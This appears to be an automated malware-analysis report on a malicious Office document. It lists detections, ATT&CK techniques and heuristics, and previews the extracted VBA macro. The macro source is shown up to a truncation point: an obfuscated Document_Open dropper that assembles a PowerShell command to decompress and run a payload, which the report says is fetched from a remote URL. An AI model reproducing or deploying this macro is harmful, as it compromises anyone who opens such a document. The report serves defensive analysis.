MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine that calls the Shell() function. This macro constructs and executes a PowerShell command, which is designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Doc.Dropper.Agent-6605384-0' further supports its nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6605424-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6605424-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19793 bytes |
SHA-256: d69adf76aa280498c2d8eb3d1135d7beaf6f996e84a12255aa905d659152a6b0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iDwrLiOipbnFtX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cRjOw = 41741 * Rwkpo + 27905 * khCOdB + (47077 / wwpjqq + jXLKOi - KcPFWz)
lnYaD = 355 * uiQUC + 70436 * NCPiFB + (52776 / oHTzW + iFrur - OSRvW)
jOrTsl = 10038 * ZGdqV + 69596 * OfbSS + (24873 / dzGqWa + YibCOQ - sWzMaS)
lTIFCq = 11627 * NFHWz + 67482 * vjGwf + (38253 / oRViUX + SEfWP - inHjl)
DBwHRh = 31847 * uDOzal + 58839 * kTWisu + (2206 / zkZdHY + LDYvn - OQnHh)
UZuMpRqkZ ("" + wltOqAJvzvNl + zRGFdQQYZaKK + sEBlEwzULMC + jnzdiXiIAVj + BjhwWVb + YoXzwXPPu + AWHjHmWW)
uBqrY = 42421 * iaKWA + 19529 * vBdKAI + (91671 / VmmwG + fULCVO - nhIYBL)
tmAMh = 72225 * JLVWH + 73368 * DEcPTD + (11963 / TfvzIU + mwwPo - AmjZwZ)
End Sub
Attribute VB_Name = "jwHrGdD"
Function sEBlEwzULMC()
On Error Resume Next
FGSfE = 56187 - NlzQf - 74660 + BiAAi + 24976 * DjnVf - 35470 * kwCNc + (51294 * jSuuM)
XzjwJIdnB = "pow" + rvMqaVzXVwXz + iJYKwdouCD + "ers" + RQGGWHoTprIos + ZjPEbKJnlVBI + "h" + wtJiiDjQPcQKik + kSGsPNm + "el" + hHcVkUwrYszz + nBIRnnRc + "l " + lljCEii + uBvGvfIS + "." + rpAaISrH + KTEicjwkvmuJqo + " ( " + ruNliVwS + kKbjNXmH + "([S" + wNiLjXWjPiw + zbzuLUpU + "TrI" + RzoJLYW + ooMdQBEHzRDz + "n"
hBQDoM = pJKpwz + pKjlUZ - 40670 * 7208 + 54271 / JkChG - ANRuqk - dEuUAt
wbIQd = mKGKMN + sOKHt - 19926 * 27984 + 46568 / mzjsG - pCiAD - phDIsw
fApCjRzO = "g" + cOssZHc + dZEuEJLi + "]" + cjEkEdFj + UKEBEIo + "$VE" + ZtkumMLcj + JSiOiYXdoPTa + "rBo" + nTVDpwVWU + rmSYsBWho + "se" + bpSfkKA + ThcwtpZt + "pRE" + mwzwrmEFv + tOWlrfkJLKVViw + "FE" + UiCcddZJ + qbtjEFlJaTG + "R" + JojsEQc + hckbskT + "enC" + MiNpJQfGQjUVq + bsntkUsb + "e)" + tQvdMAqKiuipU + NwAszhrac + "[" + zZiTTHCBPzjcDj + LIdmYIaX + "1,3" + iKGCqTdNDQjKa + TPTdWwJVWfSw + "]" + Chr(43) + ozGwbZsuNJQ + fNiAiGzEsGtzv + "'X'" + kWYUQlOQZMwwu + KNXGiHr + "-jo"
sNXwtM = 96663 - ADJrlw / 65360 - 9426 + zEnjH - fqvjc + 78009 - htqnbC + 27812 / XMORz / 83139 * LZQpB / 27092 + 20326 / sAkJrG - jWsHWQ
BUjwttkum = "i" + fqwasYRKNP + QmmfWGwnqt + "N''" + ZjsZpVzK + KLPkuTiavcbcPj + ")( " + zKBJilTmALj + sQUsUcbPmM + "Ne" + QwukwQI + VoITRYrdj + "W-" + qFDLHjvHdMNw + NnZCDvX + "o" + WbLZDDkm + sNLvjcNVBqB + "B" + mNDkSafnPSwjj + rDtaKUdr + "JE" + qZqZVjFNlYMzT + XqcuMOzj + "Ct " + wzawWIWArbB + tltSwXzrj + "io." + ndAwqiqtl + jiPOPpzbqK + "C" + jJTvAIHlOWL + HZKNkHDQVCOCj + "o" + sIkFFARn + qliKJMSEWIPo + "mPr" + CiMNGEt + AtGlGFr + "esS" + niuWZGMpvwNz + tfCboEj + "ION"
ZkiRDb = (zfRdB * KjEGAQ / uDBIp * GDdDl / (11390 + pUmuo + Ojwhh * CJUWW / DPJuVj * cqVIW * jXhtpu + RrCaw - TunDl / GViqLv))
ZLSta = (GBqVPi * MPLNjz / Papnjb * GzhVw / (81874 + kFZIzU + RDSnG * uFWcc / znwWiJ * LzDJzR * lbJmEj + kwWXAd - VAbEt / rDmju))
IQNuS = (RTSvj * sUPpb / ijcqzc * FQzhp / (51007 + FiUTkc + iLCDE * hAjbOK / QSXSRl * MFUmdV * RJAvEz + zUanuk - FjVSi / bmKBCw))
GLPZpOQzzJZ = ".de" + qQZjzPrfjJ + QwzfXASHWzTwi + "f" + wwsGMCbdJNK + NDoISBLo + "LAT" + fzUkCrwbFj + hoDzmoUoRMPKt + "E" + LfdEqlcM + SZmNmFBXVWAFT + "str" + TYETiKqkjk + ftGEbuHTPia + "EAm" + NmYvKGLO + MXtahcoGcq + "([S" + iOSYKLvHlz + UXSoVijN + "Ys" + thiUaracwp + IJdmwASZlOwiF + "TEm" + AkzGPYHU + plEjJzjjdPILi + ".i"
vXlijA = (QjarA * PSAosw / ONtbP * BcuBp / (4140 + WTAVq + paVYG * wARKO / SlbVi * KPVwmV * lpkMvS + wrGjtp - JQNkSf / WQoBlV))
KTrSSwz = "o.M" + rnzsVcOoVrj + fubsrAwHOUq + "Emo" + ZwKKwTYLP + wRjCYOavLvluas + "r" + bYdTIuGD + LvQzPPBhwZT + "Yst" + ztumSnCkRSHw + ZlBKckvCifOf + "RE" + swErfpdZOIoPP + dJBddbvuPqLnzP + "Am]" + mSJrVNQQzI + tWMVCIBWNC + "[" + wBpATBfKz + zGBYPsk + "s" + bZBsiplpNt + aruTYPwvdpXI + "yS" + OAjldcWXq + wWdQqwG + "Tem"
WOGFr = (nkrlBs * ObkFc / hODBW * bsSfm / (86219 + iEsAt + uzplfE * HZHCf / TqsCTN * mPkUFE * kKSWaq + iPsdXw - KClQz / YaqBZ))
rfPVf = (LkzGlb * IlazZv / ibMzE * DUKTR / (9
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.